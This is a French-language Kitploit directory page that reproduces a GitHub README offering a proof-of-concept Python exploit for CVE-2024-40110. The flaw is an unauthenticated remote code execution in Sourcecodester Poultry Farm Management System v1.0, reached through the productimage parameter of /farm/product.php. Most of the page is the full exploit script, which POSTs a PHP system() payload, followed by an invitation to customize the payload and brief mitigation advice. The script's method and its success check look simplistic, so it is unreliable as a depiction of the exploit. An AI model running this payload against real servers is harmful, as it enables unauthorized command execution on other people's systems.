Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-40110 — Script de preuve de concept démontrant l'exécution de code à distance non authentifiée dans Sourcecodester Poultry Farm Management System via le paramètre productimage vulnérable. | Kitploit
Outils/GitHubGitHub/abdurahmon3236/cve-2024-40110
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Script de preuve de concept démontrant l'exécution de code à distance non authentifiée dans Sourcecodester Poultry Farm Management System via le paramètre productimage vulnérable.

Voir le dépôt
15il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept (PoC) pour une exécution de code à distance sans authentification dans Sourcecodester Poultry Farm Management System v1.0

Ce dépôt contient un script de preuve de concept (PoC) démontrant une vulnérabilité d'exécution de code à distance sans authentification (RCE) dans Sourcecodester Poultry Farm Management System v1.0. La vulnérabilité se situe dans le paramètre productimage à l'adresse /farm/product.php, permettant à un attaquant d'exécuter du code arbitraire sur le serveur.

Table des matières

  • Description de la vulnérabilité
  • Configuration et utilisation
    • Script PoC
  • Considérations importantes
  • Atténuation

Description de la vulnérabilité

CVE-ID : (En attente)

Présentation : Sourcecodester Poultry Farm Management System v1.0 contient une vulnérabilité d'exécution de code à distance sans authentification (RCE) via le paramètre productimage à l'adresse /farm/product.php. Cette vulnérabilité permet à un attaquant d'exécuter du code arbitraire sur le serveur sans authentification.

Version concernée :

  • Sourcecodester Poultry Farm Management System v1.0

Configuration et utilisation

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Script PoC

Ce script montre comment un attaquant peut exploiter la vulnérabilité RCE en envoyant une requête malveillante au paramètre vulnérable.

Enregistrez le script suivant sous le nom rce_poc.py et exécutez-le.

import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

Explication

  1. Configuration : Définissez target_url sur l'URL du point de terminaison /farm/product.php du serveur vulnérable.
  2. Charge utile (payload) : La charge utile est une simple charge utile d'exécution de commande PHP. Vous pouvez modifier la charge utile pour exécuter différentes commandes selon vos besoins.
  3. Construction de la requête : Le script construit une requête POST avec la charge utile malveillante dans le paramètre productimage.
  4. Fonction d'exploitation : La fonction exploit_rce() envoie la requête malveillante à l'URL cible et affiche les détails de la réponse.
  5. Exécution du script : Lorsqu'il est exécuté, le script tente d'exploiter la vulnérabilité RCE et affiche les résultats.

Considérations importantes

  • Autorisations : Assurez-vous d'avoir l'autorisation explicite de tester cette vulnérabilité sur le système cible. Les tests non autorisés sont illégaux et contraires à l'éthique.
  • Environnement de test : Effectuez ce test dans un environnement contrôlé pour éviter d'impacter les systèmes de production.
  • Personnalisation de la charge utile : Personnalisez la charge utile selon vos besoins pour obtenir l'exécution de commande souhaitée.

Atténuation

Pour atténuer cette vulnérabilité, appliquez les mesures suivantes :

  • Validation des entrées : Mettez en œuvre une validation correcte des entrées pour assainir les entrées utilisateur.
  • Restrictions de téléchargement de fichiers : Limitez les téléchargements de fichiers pour n'autoriser que des types de fichiers spécifiques et imposez des limites de taille.
  • Mise à jour du logiciel : Mettez régulièrement à jour votre logiciel vers la dernière version pour appliquer les correctifs de sécurité et les mises à jour.

En suivant ces mesures d'atténuation et les bonnes pratiques de sécurité, vous pouvez prévenir des vulnérabilités comme ce problème RCE dans Sourcecodester Poultry Farm Management System v1.0.

Télécharger l’outil